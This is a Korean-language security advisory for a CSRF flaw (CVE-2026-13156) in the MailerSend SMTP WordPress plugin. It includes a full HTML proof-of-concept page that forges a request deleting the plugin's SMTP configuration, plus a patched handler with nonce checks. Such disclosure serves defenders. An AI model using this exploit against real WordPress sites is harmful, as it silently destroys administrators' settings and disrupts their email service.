
CVE-2026-13156 취약점 권고 및 PoC — Huynh Kien Minh(MinhHK) 발견.

[!IMPORTANT] 요약: WordPress용 공식 MailerSend SMTP 통합 플러그인(
< 1.0.8)에서 높은 심각도의 사이트 간 요청 위조(CSRF) 취약점(CVE-2026-13156)이 발견되었습니다. 구성 삭제 핸들러mailersend_handle_configuration_delete()는 관리자 권한(manage_options)을 확인하지만 WordPress Nonce 검증(check_admin_referer())을 완전히 생략합니다. 공격자는 인증된 WordPress 관리자를 대상으로 악의적인 교차 출처(cross-origin) 요청을 구성하여 저장된 SMTP 자격 증명을 조용히 삭제하고 플러그인 비활성화를 강제할 수 있으며, 이로 인해 모든 이메일 워크플로에서 전체 애플리케이션 서비스 거부(Application Denial of Service)가 발생합니다.
CVE-2026-13156 (WPScan 권고 ID: 595e653d-0904-43cf-8e61-d684599de11b)1.0.8 이전 버전 (< 1.0.8)연구원 소개:
Huynh Kien Minh (Huỳnh Kiến Minh)은 심층 보안 평가와 책임 있는 공개(responsible disclosure)로 잘 알려진 능동적인 사이버 보안 연구원이자 취약점 분석가로, CVE-2026-13156에 대한 기술적 분석을 포함합니다. 또한 Proton Security Hall of Fame 에서 심각한 보안 취약점을 발견하고 공개한 공로로 공식적으로 인정받아 명예를 얻었습니다.
이 기술 권고를 검증하고, 개념 증명(PoC) 분석을 살펴보거나, 연구원과 연락하려면 다음을 방문하세요:
WordPress용 MailerSend 공식 SMTP 통합 플러그인(1.0.8 이전 버전)은 관리 대시보드에서 트리거될 때 저장된 API 토큰을 삭제하고 SMTP 구성 옵션(wp_options)을 초기화하며 플러그인을 비활성화하기 위한 관리 작업(configuration-delete)을 등록합니다.
엔드포인트는 활성 사용자에게 manage_options 권한이 있는지 확인하지만(요청이 관리자 세션에서 발생했는지 보장), WordPress nonce(check_admin_referer() 또는 wp_verify_nonce()) 검증을 수행하지 않습니다.
nonce 검증이 없는 HTTP 요청은 의도적인 관리자 클릭과 위조된 교차 출처 요청을 구분할 수 없기 때문에, 인증된 관리자가 로드한 모든 외부 사이트가 configuration-delete 작업을 조용히 트리거할 수 있습니다.
< 1.0.8)를 사용하는 대상 WordPress 사이트를 식별합니다./wp-admin/admin-post.php 또는 /wp-admin/admin.php?page=mailersend&action=configuration-delete)를 대상으로 자동 제출 양식을 포함한 악성 HTML/JavaScript 웹페이지를 구성합니다.[!WARNING] 윤리적 고지: 다음 HTML 사이트 간 요청 위조(CSRF) 개념 증명 페이로드는 Huynh Kien Minh 이 윤리적 공개 프로토콜에 따라 교육 목적, 방어적 검증 및 보안 감사 목적으로만 제공합니다. 승인되지 않은 대상을 대상으로 실행하지 마십시오.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 이상으로 업데이트하세요.WordPress 플러그인에서 관리 상태 변경 작업을 안전하게 보호하려면 개발자는 요청을 처리하기 전에 엄격한 nonce 검증을 시행해야 합니다:
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
이 저장소와 기술 권고는 더 안전한 글로벌 WordPress 및 사이버 보안 생태계를 조성하기 위해 책임 있는 공개 지침에 따라 Huynh Kien Minh (MinhHK) 이 유지 관리하고 게시합니다.